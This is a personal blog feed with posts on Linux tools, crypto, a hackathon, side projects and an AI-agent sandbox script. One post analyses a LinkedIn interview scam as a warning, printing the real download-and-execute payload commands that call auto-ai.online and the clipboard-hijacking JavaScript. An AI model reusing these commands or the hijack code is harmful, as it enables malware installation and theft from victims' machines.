https://kaveh.page/feed.xml

I think it is to safe persistent tabs (e.g. session restore) is an essential feature of any web browser. Most people likely would have a hard time managing without one.

I have been puzzled by the scarcity of file managers with persistent tabs in the Linux ecosystem. Nautilus, the default file manager in GNOME, is likely the one most people new to Linux experience given the popularity of Ubuntu and Fedora. Nautilus has had a feature request for 17 years (!) and still no support for persistent tabs.

The only viable file manager I have found with session restore has been Dolphin, but installing it would pull in a crapload of dependencies and basically the entire KDE core which makes it janky on Ubuntu (my main driver) and doesn't quite look like it belongs.

Last year I decided that complaining won't get me anywhere and went on a thorough hunt for how to make it happen. First I thought maybe I make my own file explorer, but decided against it when I discovered Nemo from Cinnamon. I figured this would be the perfect file manager had it had persistent tabs.

I went through two of the previous issues (2832 and 3240 with the same feature request and saw the maintainers had concluded this is a non-core feature and not worth implementation due to resource constraints.

I honestly don't know how people live without persistent tabs in file managers, so I disagree with that being a non-core feature. I took a quick look at nemo's code on github and found it pleasantly easy to follow. C is the first programming language I ever learned, and even though it's no longer in my daily tools, I can still hold my ground. With some help from Claude Code to navigate the code base, I implemented the tabs in my fork and within a weekend I had my own custom file manager with tabs!

After a couple weeks of working out small issues that popped up, I submitted a PR) and after four months, viola! Now nemo has tabs, and I have my well-deserved tabs in my favorite file manager!

All of this was possible because of the power of open-source software, and a robust ecosystem that encourage contributions and productive discourse. After all, open-source software is the sum of all our contributions.

I have been using Claude Code as my primary coding agent for a couple of months by now. While it has its own sandboxing, I have found this part of the sandbox to always be an absolutely scary thing to read for any program that has unfettered internet access:

Default read behavior: Read access to the entire computer, except certain denied directories

That means CC is allowed by default to look in your ~/.ssh folder, your ~/Documents, ~/Pictures, or hell, why not just vacuum your entire drive for .env files? I did ask it to tell me the content of ~/.ssh folder, and I REALLY did not like the answer I received. It is primed for a simple prompt injection to say the least.

Judging by the threads on Reddit and Hacker News, llms have gone awry plenty of times already and I think it's just a matter of time until a real disaster occurs somewhere it really matters.

I am not waiting around to find out, so I have been running my coding agents in a headless VM for a couple of months now to completely isolate them from accessing anything on my own machine. Not bulletproof, but as good as it comes without hauling around another separate machine.

That said, running VMs is resource intensive, and I've been running short of RAM quite a bit. So here's a middle-of-the-road method that would isolate your CC session using bubblewrap on linux. I came across this article on Hacker News and got interested to try it out for myself.

Put it in your ~/.local/bin folder and instead of running claude, you can run claude-sandbox.sh and you'll be good to go. It will only see the current folder it's been launched in plus some of the other folders that are required for claude to run its binaries, but other than that you can ask it to show you what it sees in your ~/Document or ~/.ssh and you'll be pleased with the results.

#!/bin/bash

# Claude Code Sandbox Script
# Run this from any project directory to launch Claude in a sandboxed environment

PROJECT_DIR="$(pwd)"
CLAUDE_PATH="$(command -v claude)"
CLAUDE_REAL_PATH="$(readlink -f "$CLAUDE_PATH")"
CLAUDE_BIN_DIR="$(dirname "$CLAUDE_PATH")"
CLAUDE_INSTALL_DIR="$(dirname "$(dirname "$CLAUDE_REAL_PATH")")"

# Ensure directories exist
mkdir -p "$HOME/.claude"
mkdir -p "$HOME/.cache/claude-cli-nodejs"
mkdir -p "$HOME/.cache/claude"
mkdir -p "$HOME/.local/state/claude"

BWRAP_ARGS=(
    # System binaries and libraries (read-only)
    --ro-bind /usr /usr
    --ro-bind /lib /lib
    --ro-bind /lib64 /lib64
    --ro-bind /bin /bin

    # System config (read-only)
    --ro-bind /etc/resolv.conf /etc/resolv.conf
    --ro-bind /etc/hosts /etc/hosts
    --ro-bind /etc/ssl /etc/ssl
    --ro-bind /etc/passwd /etc/passwd
    --ro-bind /etc/group /etc/group

    # Claude installation (read-only)
    --ro-bind "$CLAUDE_BIN_DIR" "$CLAUDE_BIN_DIR"
    --ro-bind "$CLAUDE_INSTALL_DIR" "$CLAUDE_INSTALL_DIR"

    # Claude config and state (read-write for auth/settings)
    --bind "$HOME/.claude" "$HOME/.claude"
    --bind "$HOME/.cache/claude-cli-nodejs" "$HOME/.cache/claude-cli-nodejs"
    --bind "$HOME/.cache/claude" "$HOME/.cache/claude"
    --bind "$HOME/.local/state/claude" "$HOME/.local/state/claude"

    # Project directory (read-write)
    --bind "$PROJECT_DIR" "$PROJECT_DIR"

    # Temp, proc, dev
    --tmpfs /tmp
    --proc /proc
    --dev /dev

    # Namespacing
    --share-net
    --unshare-pid
    --die-with-parent
    --chdir "$PROJECT_DIR"
)

# Add ~/.claude.json if it exists
if [[ -f "$HOME/.claude.json" ]]; then
    BWRAP_ARGS+=(--bind "$HOME/.claude.json" "$HOME/.claude.json")
fi

# Add .gitconfig if it exists
if [[ -f "$HOME/.gitconfig" ]]; then
    BWRAP_ARGS+=(--ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig")
fi

# Add .nvm if it exists (needed for node)
if [[ -d "$HOME/.nvm" ]]; then
    BWRAP_ARGS+=(--ro-bind "$HOME/.nvm" "$HOME/.nvm")
fi

# Add Rust toolchain if it exists (needed for cargo)
if [[ -d "$HOME/.cargo" ]]; then
    BWRAP_ARGS+=(--ro-bind "$HOME/.cargo" "$HOME/.cargo")
fi

if [[ -d "$HOME/.rustup" ]]; then
    BWRAP_ARGS+=(--ro-bind "$HOME/.rustup" "$HOME/.rustup")
fi

# Add SSH known_hosts for host verification (read-only)
if [[ -f "$HOME/.ssh/known_hosts" ]]; then
    BWRAP_ARGS+=(--ro-bind "$HOME/.ssh/known_hosts" "$HOME/.ssh/known_hosts")
fi

# OPTIONAL: Uncomment if you need git over SSH (exposes your SSH keys read-only)
# if [[ -d "$HOME/.ssh" ]]; then
#     BWRAP_ARGS+=(--ro-bind "$HOME/.ssh" "$HOME/.ssh")
# fi

exec bwrap "${BWRAP_ARGS[@]}" "$CLAUDE_PATH" "$@"

After attending last year's amazing Devcon I knew that I would be attending this year's Devconnect. I was much better prepared this time around, and had planned to do some form of residency before the gathering itself. Last year there were several great residencies in Chiang Mai before Devcon which I was bummed out that I had missed out on. Lastly, I had decided to attend my first real life hackathon at ETHGlobal.

I looked at a couple residencies, including Edge City, Funding the Commons, and Invisible Garden (IG). Invisible Garden seemed like the most dev-focused of all three, so I applied and was accepted.

After ~30 hours of flying from Vancouver, I finally arrived in Buenos Aires on October 27 and went straight to the IG venue in the heart of Palermo. Over the next three weeks, we had daily lectures by a number of mentors on a variety of zero-knowledge subjects, data analysis, crypto protocols, etc. There were a bunch of social gatherings also scheduled both within IG and with other groups in Buenos Aires that made the networking aspect of the residency quite valuable to me. I met a ton of interesting people and made lifelong friends for years to come. I opted to get my own apartment but dorm-style accommodation was also available to people who needed them to bring down the cost barrier.

This was the second year of IG and from what I gathered from repeat participants they somewhat preferred the one the year before. I think a lot of it had to do with the choice of location. In Chiang Mai IG was for six weeks with a proper 24/7 co-work, but in Buenos Aires given the elevated prices the program was only for 3 weeks and smaller given that Argentina is much harder to get to and into than Thailand.

Nonetheless, I think it was a worthwhile endeavor for me and the main value was meeting the other builders in web3 which I am sure I will continue to run into and maybe even work alongside.

For the final projects, my team built a ZK-version of the classic rock-paper-scissors game. Nothing ground breaking about the game itself, but ZK tech is evolving at a rapid pace and I wanted to try my hands at a ZK implementation of something I am familiar with. The ZK circuit is written in Noir which I found pleasant with a fairly smooth developer experience. Overall, it was a nice learning experience to build something familiar using new tech.

Devcon is a top-down gathering where the Ethereum Foundation (EF) does most of the planning. Devconnect in contrast in usually a bottom-up loose collaboration where the EF provides a space but the vast majority of events are community organized. This year it was a bit different with the ETH Day organized which I think as result of the latest much-needed shakeup at the EF and orienting itself to be more product and market focused.

I attended a lot of side events, including DSS, FtC Day, Ethereum Cypherpunk Congress, and Sub0. You can find most of the talks online. The real value of attending in person is networking and soaking the incredible energy of other like-minded attendees.

I have to say I enjoyed Devcon quite a bit more last year. I think I found the structure of Devcon and quality of talks higher last year, and maybe it was my volunteering experience that made it so much better. In Bangkok also it was far easier to make it to the events given the general proximity of venues and ease of getting around, but in Buenos Aires it was much harder to go from one event to another one which usually required almost an hour-long travel.

One particular event I really enjoyed was meeting all the friendly faces at Kernel Community. I was part of KB11 and really enjoyed meeting other fellows from all cohorts.

I have long wanted to attend an in-person hackathon. When I used to work as a corporate drone, there was a blanket ban on any form of participation in outside activities which is one of the main reasons I don't think I can ever work a corporate job in tradfi again. I couldn't write a blog, contribute to open source project, or participate in community events even as myself, not representing my employer. It has been a breadth of fresh air to be able to participate in community events and go deep in open source projects and even make a couple myself.

ETHGlobal is normally right after the main Ethereum conferences and runs for just about two days giving just about 36 hours to hack something together. You are meant to build during those 36 hours to either become a finalist (top 10 projects) or win some prizes from the sponsors.

After I arrived at the venue, initially I was quite taken back because I realized that many people had showed up having worked on their projects beforehand. For instance a couple people showed up with hardware which clearly had taken them at least weeks to put together. Recognizing this, I realized there is no room to experiment with new tech if I want to have a shot at winning. I took a look at the list of sponsors and narrowed down which tracks I can build with.

I am a huge fan of crypto payments, so after some planning, I figured combining Privy + Circle I can make some form of gas-sponsored payment app via one of my favorite EIPs, EIP-7702 that went live earlier this year in Pectra. Crypto has a huge UI/UX problem and a higher barrier to entry for most people. When it comes to payments, one of the major issues is that you need some form of native token to spend what you already have. This is an unnatural experience, to say the least. It is like you wanting to spending your USD, but somehow you're required to also have some Euros if you want to spend it. It doesn't make sense to the average user and before Pectra gas sponsorship was a lot more difficult than it is now.

Thus, my idea was to build a gas-sponsored payment system using USDC where your stablecoin is, you can spend it on any other chain, including Circle's Arc, seamlessly and without needing any native token.

After two back-to-back all-nighters of solo hacking, I finished ArcBeam and presented it to both the judging panel and the sponsor teams themselves.

There was a six-hour gap between when you submit your projects and when the closing ceremony happens. After I took a two-hour power nap, I started going around and connecting with other hackers to meet them and see what they've been up to. I love the creativity and grit of the people I met. The energy is the room is simply infectious. This is what happens when the corporate horse blinders are not in place and souls haven't been crushed into obedience in bullshit HR training sessions and corporate bureaucracy. Just watch the projects presented during the closing ceremony and that should give a fair feeling for it. One of my favorite things I didn't know is that you were encouraged (via an additional prize) to make as much noise as possible if your project won. It was hilarious to watch sleep-deprived hackers yell at the top of their lungs which got progressively louder as the closing ceremony went on.

I did win prizes from both of the sponsors I had targeted, which felt amazing at the moment. I feel like the energy of the other people I was hacking alongside had given me extra motivation to push through and get something viable going in the 36 hours that I had.

You can watch all the workshops and closing ceremonies on the ETHGlobal YouTube channel.

I've stayed back in Buenos Aires till my 90-day visa is up in January and will likely head to Brazil to kick back on a beach and surf a bit. Argentian has a lot to offer and I think I'll be back to experience the rest of the country, most certainly Patagonia. That said, for now I have a lot of work on my plate and Buenos Aires has been fairly pleasant, so I'm enjoying it. It is a country that seems to still be in semi-crisis mode, with signs for 20-30% discounts on cash payments everywhere. Crypto payments are fairly commonplace. Inflation that used to be 200-300% per year is now down to 10-30%. That said, for a country that has a GDP per capita of ~ 14k USD, it is more expensive than the vast majority of European countries. Without getting too deep into the politics of it, it is an unsustainable situation where the government has propped up the peso to keep the price of its imports under control and effectively subside the cost of living. I don't think that's sustainable situation with the peso overvalued by at least 2x in my opinion, but that's a deeper conversation for another time.

I have heard all the usual nonsensical attacks on crypto by now: It has no real use. It is only for criminals. It uses more electricity than [insert country name here]. It is a casino. It is too volatile. It is too slow. It is stupid. I just don't like it. List goes on.

The latest trend seems to be "quantum computing" posing an existential threat to bitcoin. I am no expert on cryptography, but I can say this much: It is one of the last things that anyone could possibly care about when it comes to bitcoin.

A large quantum computer would break elliptic curve cryptography. Bitcoin uses elliptic curves, so yes, it would be affected.

That said, don't mistake not seeing the forest for the trees.

It is a problem for basically everything on the internet that uses current prevalent way of authentication. If a cryptographically relevant quantum computer showed up tomorrow,you would not be able to securely log into your email, your bank, your social media accounts, etc. All your electronic devices (including your digital car keys) would be at risk. Public wifis overnight would effectively become plain-text communication channels.

This is not a "Bitcoin" problem. It is a cryptography problem.

Have you ever wondered how you can connect to a wifi spot and communicate securely with your bank's servers? All traffic on the internet is more or less available to anyone else. If you've connected your phone in public, anyone with a little bit of know-how, a cheap wifi adapter, and a packet analyzer can capture the entirely of your traffic. Encryption is the ONLY thing that assures your privacy and ability to communicate in public via the internet.

Bitcoin's seminal whitepaper didn't invent a single new technology that did not exist before. If you've ever used an email, it's likely that you more or less used all the technology that is involved in getting a blockchain off the ground. The spam filter almost certainly used a variant of "proof of work", the message was sent encrypted via ECC. It is the combination of existing technologies that unlocked the new use case for what blockchains are actually used for.

While I am hardly an expert on the subject, I think it is safe to say that quantum machines that can break ECC are not here today. There is no evidence anyone has built one and if they have, it is not widely accessible and no evidence of having broken encryption en masse yet. The timeline estimates have been getting shorter, with some estimates as early as 2030. The threat is very real.

Again, quantum computing is hardly a "bitcoin" problem. It is a "crypto" problem, but the one in "cryptography", not in "cryptocurrency". There is already significant work underway for a post quantum world.

Bitcoin's problem can be solvable by switching to a quantum-resistant mechanism. I am not as familiar with the Bitcoin's ecosystem and haven't come across a coordinated effort thus far to address this. However, in Ethereum, this research is well under way with clear tracks dedicated to it, you can read about here.

In the end, I think quantum computing is hardly a threat to bitcoin. The likeliest path is a change in the core protocol to adopt a quantum-resistant consensus mechanism. It will be messy as it is require a significant change and the bitcoin crowd is heavy into the "digital gold" narrative which makes it extremely resistant to changes to the core protocol, but it will get done. If I had to pick the largest threat to bitcoin's existence, it would be its fixed security budget model, but that's a story for another time.

I aim to take somewhere between 150-200 of protein per day. Normally about 75g of those are supplemented via protein powders or protein bars.

I've long had a spreadsheet of my favorite brands that I use to calculate my macros + order the cheapest brand I like in bulk when I run out. There's at least 7-8 brands whose quality I trust (most importantly, not amino spiking) and whose taste I find enjoyable. Amongst those, then the deciding factor simply becomes the price. Normally I just go with my favorite brands (which is Myprotein, and no I am not getting paid for this) but I've noticed that the prices have been swinging quite noticeably the last couple of years.

I figured if I am doing this, other people might be doing the same. For a weekend project, I decided to start scraping some prices from the retailers I use and automate this comparison. I was in for a few surprises.

Most retail websites do not allow scraping of their information. That's not terribly surprising. For instance this is Myprotein's robot.txt. What I did find surprising however is that almost none have any sort of API calls either. I looked at some of the ones I had used in the past, iHerb, GNC, etc. Even the ones that have affiliate program (e.g. GNC) do not really provide a method to programmatically pull in their information. Walmart does have an API, but the bar to get access is not worth pursuing for a side hobby of this scale.

The only viable path I found was Amazon Associate program. The sign-up was fairly easy, but the access to their API requires approval.

Seeing that the path of least resistance was Amazon, I set the goal to qualify for Amazon's Product Advertising API (PA API).

Signing up as an Amazon Associate was reasonably painless. You fill in the application and list your app, and you get conditional approval. The PA API, however, is not automatically granted when you sign up as an associate. You need to generate 3 qualifying sales in 6 months and abide by the program policies. The only tool available to you in the beginning is generating links via SiteStripe.

A specially difficult one for me was this condition:

In addition, if you choose to display prices for any Product on your Site in any “comparison” format (including through the use of any price-comparison tool or engine) together with prices for the same or similar products offered through any website or other means other than an Amazon Site, you must display both the lowest “new” price and, if we provide it to you, the lowest “used” price at which the Product is available on the Amazon Site.

Given that I was building a comparison shopping website, lack of access to PA API meant that I had to manually update the prices. Scraping also broke their policy. So I put a disclaimer at the bottom of the page that this is a demo website only, prices are manually updated, and should not be relied on.

I listed about 40 protein powders that I was familiar with and started updating their prices once a day manually.

About 2 months later, I finally got approved for the program and got access to the PA API.

PA API is easy to use. The SDK works quite well and the provided code basically got me 90% of the way there. That said, I was surprised that the information you can retrieve is a small amount of the information available on Amazon's website. Most notably, you cannot readily pull in the reviews or all pictures of a product.

That said, the thing that mattered to me the most was having up-to-date prices and the SDK does that just fine.

I had to contact support a couple of times and found them to be responsive and generally knowledgeable. The documentation could use some improvement, however. When I wanted to expand the comparison to other regions, found out that you had to apply for each region to be approved separately and cannot use the same approved account for instance on amazon.co.uk. You can set your shop to be available in multiple regions through OneLink but that's apparently a completely separate program.

I built the frontend with Next.js which I've found to be my preferable frontend framework. Straightforward to get everything working especially with a lot of help for boilerplate code from Claude.

The backend is python code given that I only need prices updated 1-2x a day and the SDK code was already in python. Aside from dealing with the regional quirks mentioned above that got me lost in the documentation, was fairly painless otherwise. As for database, Supabase was plenty good for this project.

Right now the updates are automated with cron jobs on my homelab, but I think I'll migrate to Airflow when I find the time.

I haven't done much marketing around the app. I've been replying to some comments on reddit where people have asked for a comparison of protein powder macros or prices with genuine attempt at helping and if appropriate, stating that I have built this tool that I personally use myself.

I'm mostly relying on the SEO traffic which is slow to pick up but the initial start has been promising.

Since launching, I've added protein bars as well. If you think of other products you'd like see comparisons for, please do let me know! I might add other supplements I take, e.g. creatine, fish oils, etc., but since I don't think there's too many choices there not sure how useful that would be.

It is making beer money at the time, but if it picks up I might sink more resources to it down the line.

It was a really fun project to build and I learned quite a bit about what makes Amazon such a successful giant!

This is the story of a sophisticated job interview scam that happened to me on LinkedIn using social engineering and an obfuscated clipboard hijacking to push a malicious payload.

I spotted the scam pretty quickly and tried to schedule a phone call or video interview to see how far this scam goes but aside from a LinkedIn conversation couldn't directly get in touch with the scammers. I am sharing this to serve as a warning and provide ways you can protect yourselves as AI tooling makes attacks such as this further possible to bad actors online.

I have written the story in the section below, but if you just want to see the technical details of the attack then scroll down to Technical Details.

I received a message on LinkedIn from a profile with the name Aftab Habib (PDF here in case of takedown) claiming that they're recruiting for a Portfolio Manager at Galaxy Digital:

Right off that bat this seemed a bit sus. No actual job description. I check Galaxy's career section and do not see this "fully remote portfolio manager" job. Alright, let's see how far deep the rabbit hole goes.

I messaged back to ask for a job description, here it is.

Honestly that looks kind of legit! I'm sure it's lifted from elsewhere and ran through some gpt, but not too shabby!

Then he sends me a message to butter me up which is clearly copy/pasted from ChatGPT where he has fed my profile.

Alright, there is a link to some website called "talentpreview360.com". Head over to ICANN and look it up:

Looks only a few months old. Registrar is "Hostinger Operations, UAB" which apparently is an ICANN-accredited registrar based in Lithuania. Never heard of it, but OK let's proceed.

I spin up a VM and go to the link. This is what I'm greeted with:

Fill in and go to the "questions":

Honestly, for what is surely a scam at this point these questions sound kind of legitimate.

And now we reach the scam part. I just didn't know it yet. There's a request for a "brief video introduction". When you hit record within 2 second it errors out. I'm confused as to what's happening. I click on "How to Fix" but nothing really stands out. I notice that right-click and keyboard shortcuts for opening the console are all disabled.

I message our homeboy Aftab to see what's going on.

Alright, makes sense. I run Linux. The VM was an Ubuntu 24.04. Small market to target. Time to go to Windows.

Now on Windows the "How to Fix" looks like this:

You see the "Need to keep the drivers to up-to-date!"?

THAT'S A BIG FAT NO-NO for anyone reading this to open a terminal and run some command. I'm looking for all the ways that command is malicious, and it doesn't quite stand out to me yet. Looking for some naughty business in the "download.microsoft.com" and can't see any immediately.

I copy the "legitimate" command and paste it into a text editor...

💥 BOOM! 💥

Here's what actually got copied:

curl -k -o "%TEMP%\fixed.zip" "https://auto-ai.online/cam-v-257.fix" &&
powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" &&
wscript "%TEMP%\fixed\update.vbs"

Now that my friends, looks sus af 🚨.

That's the scam. A clipboard hijack to "fix your drivers" which would download a zipped payload from a remote server auto-ai.online and run on your machine.

After that I tried to get him to connect a couple of times for a friendly chat but apparently our aspiring scammer only wants to DM and not meet IRL. I feel be a bit rejected!

If you want to get into the weeds of what the actual attack might be, then read on below in the Technical Details.

As of now the profile of our LinkedIn Premium member / aspiring scammer Aftab Habib is still up. I presume he'll block me immediately upon seeing this. I plan to report his profile to LinkedIn + Galaxy Digital that there are scammers impersonating their staff (doubt it'll be news to them, however). Lastly, I plan to report his bogus registrations to Hostinger see how they respond.

If you can think of anything else I should be doing, please do let me know! I really wish I could've scheduled a video call with Aftab to have a lovely chat about his operation. Maybe see how his day is going.

I reported the issue to Hostinger and within a few hours I get this response:

Hello,

Thank you for your report. Listed abusive account(s) has been suspended.

Hostinger Abuse Department abuse@hostinger.com https://www.hostinger.com

Both talentpreview360.com and auto-ai.online are no longer reachable. I'm impressed by the speed of action!

I report the issue to LinkedIn and within 20-minutes I get the case marked as "Closed" with this nonsensical generic response:

Guess now I know why scammers thrive on LinkedIn. Great investigative job LinkedIn!

Second Update

After two days of emailing them and five emails, I finally reached a human-being it seems, and they have taken action. All the correspondence before were generic auto-responses with nonsensical instructions (e.g. "please report profile", "please send screenshot") where clearly no human had exerted an ounce of effort to read anything.

I have to say it felt like LinkedIn has a trash process on purpose to intentionally sandbag reports. It should not be this hard to report a scam especially when there's a report on a platter handed out exactly identifying the scam.

This is some general advice I can give you that would be relevant in any online interaction nowadays:

• NEVER copy/paste commands from anyone. Period. If you must, type it in after you thoroughly inspect it. Also running it through an LLM would be a good idea to make sure you didn't miss anything.
• If someone is reaching out to you on an open platform like LinkedIn or X where any monkey can open an account, only respond if they're able to email you from a legitimate corporate email account. Email headers are spoofable as well, but it's a bit more difficult and would be almost impossible to have a back and forth conversation via email.
• Use reputable job platforms and verify company legitimacy. Check the company's website for the actual opening instead of accepting documents or job postings in messages.
• Be extremely suspicious of "driver updates" or "software installations" during interviews. Read a cautionary tale here.

"Hacking" used to be predominantly finding vulnerabilities in servers or locally accessible mal-configured devices. Now it seems that social engineering is a huge part of the attack surface. I am generally super paranoid, but I can see that with some more sophistication even I could've possibly slipped at some point. Especially now that audio/video can be faked with AI, you need to be super suspicious of online interactions even with people you think you know.

From a purely technical standpoint it's not the most sophisticated attack out there, but it's reasonably well-executed and the malicious code is heavily obfuscated that you would not pick it out right off the bat. Obviously if you're a non-technical person then all of this will likely go over your head.

I have saved the files in the git repo if you want to check it out for yourself.

The scam presents itself as a legitimate job interview platform with professional-looking branding, then asks the candidate to complete a "technical assessment" and a video interview. The last question asks for a video interview that is designed to fail. Then they want you to "update drivers" which is when users are shown commands that appear legitimate but are actually replaced with malicious payloads when copied to clipboard.

On Windows the after the camera "errors out" after a couple of seconds, a "How to Fix" popup shows this command to run:

curl -L "https://download.microsoft.com/download/graphics-driver-update.exe" -o driver-update.exe && driver-update.exe /silent

While a technical person would likely be alerted already at this stage, I presume the average user is greatly comforted by the presence of 'microsoft.com' in that domain. When you copy/paste the command, the command that actually gets copied is

curl -k -o "%TEMP%\fixed.zip" "https://auto-ai.online/cam-v-257.fix" && powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" && wscript "%TEMP%\fixed\update.vbs"

Doesn't look so friendly now, does it? I presume the average user who would open a terminal also would just copy/paste and hit enter without thinking about it twice.

The attack uses a React application that implements clipboard hijacking through a useEffect hook:

Clipboard Hijacking Code

(found in page5_files/index-CXN-5r39.js.download, line 164):

S.useEffect(() => {
  const l = (u) => {
    if (!window.getSelection()) return
    const d = i === 'win' ? r.windows : r.mac
    u.clipboardData && (u.clipboardData.setData('text/plain', d), u.preventDefault())
  }
  return (
    document.addEventListener('copy', l),
    () => {
      document.removeEventListener('copy', l)
    }
  )
}, [r, i])

How the Attack Works:

1. Setup: S.useEffect sets up a copy event listener when the component mounts
2. Event Interception: When user copies (Ctrl+C), the function l is triggered
3. Platform Detection: const d = i === "win" ? r.windows : r.mac selects the appropriate malicious command based on the user's platform
4. Clipboard Replacement: u.clipboardData.setData("text/plain", d) replaces the clipboard content with the malicious command
5. Prevention: u.preventDefault() prevents the original legitimate text from being copied

Obfuscation Techniques:

The code is heavily obfuscated with lots of redundancies and nonsensical variable names. All whitespaces are also removed so the code is compressed into a single line. Right-click and opening of console via keyboard shortcuts is also disabled. The malicious code is mixed with genuine React applicable code to make it harder to detect.

The command that gets executed on Windows systems:

1. Downloads a malicious ZIP file from auto-ai.online/cam-v-257.fix
2. Extracts it to the Windows temp directory
3. Executes a VBS script (update.vbs) that contains the actual malware payload

I loaded a VM and downloaded the payload. A screenshot of the zip file's content is below:

What the VBS script does:

1. Extracts dll.zip
2. Executes chost.exe audiodriver.py (runs in background)
3. Obfuscation: Uses string concatenation to hide commands ("ch" & "ost.exe")
4. Stealth: Runs commands with hidden windows

I looked at the python code, and they're putting in registry entries to start the binaries at startup, so this attack will be scanning the system continuously for anything of value. e.g. API keys, seed phrases, banking information, etc.

The command that gets executed on Mac systems:

curl -k -o "/tmp/fixed.zip" "https://auto-ai.online/cam-v-257.fix" && unzip -o "/tmp/fixed.zip" -d "/tmp/fixed" && chmod +x "/tmp/fixed/update.sh" && "/tmp/fixed/update.sh"

I didn't download the Mac payload but safe to assume it operates similarly.

I’m on the record saying, that maybe Valve will actually save the Linux desktop. And it’s actually not because I think games are important! I don't care, I don't play games. I think some people do, so games maybe important. But the really important issue is I guarantee you Valve will not make 15 different binaries. And I also guarantee you that every single desktop distribution will care about Valve binaries. - Linus at DebConf 2014

I switched fully to Linux in 2020 after I got unshackled from corporate chains and Windows basically had deteriorated to a point that it's hard to distinguish it from spyware. Since then, despite having an Nvidia GPU, I have been using Linux as my main OS to work and game and have noticed that my experience has been progressively getting better every year. I attribute a huge part of that to the release of SteamDeck and SteamOS.

Valve ended up being the hero Linux never knew it needed. For years, desktop Linux limped along with niche adoption, hamstrung by weak hardware support, half-baked drivers, and the eternal “I can't game on Linux” excuse. Valve singe-handedly changed that.

Valve's sponsoring of Proton and Vulcan has been a boon to Linux gaming, but as Linus said, it’s not just about games. It’s about the entire ecosystem. Hardware vendors started caring about Linux not because of some abstract open-source ethos, but because Valve put money, polish, and a few million SteamDecks in people’s hands.

Proton made the gaming argument obsolete, smashing through the wall that held Linux back for decades. And crucially, SteamOS reframed Linux as consumer-ready. Not just a hacker’s toy, but a device you can hand to someone who just wants to play. Aside from some game requiring hardcore anti-cheat software requiring rootkits (which I wouldn't install anyways), the overwhelming majority of games I play run great on Linux.

It’s not perfect. Nvidia is still a thorn, and most of the gains are accrued to gaming and AMD hardware. But in practical terms, Valve gave Linux Desktop what no distro could on its own: legitimacy, drivers that work, and a perception shift from “geek experiment” to “mainstream option.”

Thank you Valve. You have dramatically upgraded my OS experience.

The global equity market is massive, but access to it is deeply uneven, even more so if you are not in a developed country. I believe single stock perpetual futures, built on crypto rails, are a great way to meet the global demand for equity exposure past the limitations of traditional finance.

Large swaths of the world's population are locked out of equity returns. Each of the Mag7 stocks are worth more than the entire equity markets of many countries, including developed ones in Europe. Access to foreign equity returns is not easy, requires access to a brokerage, and often comes with high fees.

Perpetual single stock futures on crypto rails would allow anyone to gain exposure to the equity returns without having to open a brokerage account at low fees. They would be available to anyone with a crypto wallet, which is a far more democratic and accessible market.

I know fractional ownership is available, but it is still not accessible as it should be and only some brokerages offer it. This would allow you to buy just a few dollars' worth of that Berkshire Hathaway stock without having to worry about the minimum investment amount.

Your brokerage can change the terms of the leverage at any time, and they often do. Shorting is particularly perilous and I've had a few experiences myself with Interactive Brokers where they changed the terms of the leverage on me overnight, asking for 5x the margin without any warning. Futures give you a fair and transparent way to trade with leverage, and you can always see the margin requirements and funding rates in advance, with a cap and a floor.

I believe single stock futures would open a whole new world of financial engineering opportunities. Here are a few examples I can think of:

Crypto is the first truly 24/7 market. Even FX markets have a break. By allowing 24-hour trading on the perps, you can trade around the clock without having to worry about the stock market hours. It would also provide a way to gauge where the market is headed as the news roll in but the stock market is closed.

Futures are inherently levered financial instrument, and it's no secret that people love leverage. That's why there has been a fairly consistent contango in the crypto futures markets normally in the double digits. Perps would allow you to trade with leverage, with a transparent funding rate formula known in advance.

Own an ETF but want to underweight a particular stock? You would be able to do that with single stock futures pretty cost efficiently without needing a brokerage to find you a borrow.

Bankers love financial engineering. That's no secret. Right now the most effective way to get voting rights in a company is to buy the stock, try to get seats on the board, and then try to influence the company. This is a risky and arduous process, and it doesn't always work out. Proxy wars are even more difficult. Options can be used to hedge the downside risk, but they have finite lives and nonlinear payouts.

Having liquid futures on a stock would allow you to effectively strip out the voting rights and trade them separately, which is currently only possible to large institutional investors with hefty ISDAs in place.

They are certainly not a new idea, and in crypto they are by far the most popular type of derivative. In tradfi however, they have not caught on as much. Institutional investors wouldn't really need them as they likely have better products such as equity swaps that wouldn't require them to post as much collateral. That leaves retail, and most retail investors have not been deemed sophisticated enough to understand the risks of trading futures.

In the USA there was a single stock futures exchange called OneChicago, but it was shut down in 2020. As far as I am aware, the largest existing single stock futures markets are in South Africa and India.

Tokenized stocks are coming and I am a firm believer of everything-tokenized future. That said, as someone who deeply looked into launching a tokenized real-estate fund, tokenized real-world assets are a huge legal and regulatory lift given that they are securities and not derivatives. They will be offered largely to the same client base that exist on their brokerage. I also think that market for tokenized stocks will be dominated by existing big players who have the domain expertise and an existing distribution network.

This is probably the biggest risk and an area that has to be worked out. The client base for single stock perps would be global, but the regulatory environment is not. I would not offer these perps in the US, and it wouldn't really be the target market anyway.

I am looking for a co-founder to build this. I have +10 years of experience in quantitative finance, and while I wouldn't be a coding prodigy I am competent and have built a few hefty algorithmic trading systems in the past. You can read a bit more about me here. Ideally my co-founder would have a technical background, preferably with blockchain experience to complement my own background.

I am geographically mobile and can meet in person pretty much anywhere, but I am also happy to work remotely. I have no other obligations at the moment and can dedicate to this project full-time for at least the next 6 months.

Happy to have a chat with anyone who would be interested in this project even if just to bounce ideas.

Having used ChatGPT for a while, I have gotten used to the "dictate" feature which allows me to speak and transcribe my words into text. Given that I've become a fairly heavy user of Cursor AI, I wanted to replicate this experience on my Ubuntu desktop. Surprisingly, I was not able to find any native or readily available speech-to-text solution. So I decided to create a GNOME extension that would allow me to do just that.

Since the advent of AI programming, I've found myself far more open to exploring unfamiliar technologies and programming languages. It's made me far more likely to just dive into an unfamiliar tech stack, knowing that I can ask for help and get guidance along the way, at least in the early stages of learning.

My plan was to use this opportunity to learn how to create a GNOME extension, which I had never done before. Since Linux is written primarily in C, I was ready to brush up on my C skills.

I took a look at the GNOME extension documentation and found it a bit dry. So I headed over to ChatGPT and asked it to walk me through the process of creating a GNOME extension.

JavaScript? What? I was expecting to use C, but it turns out GNOME extensions are primarily written in JavaScript. I obviously had to ask ChatGPT why that's the case.

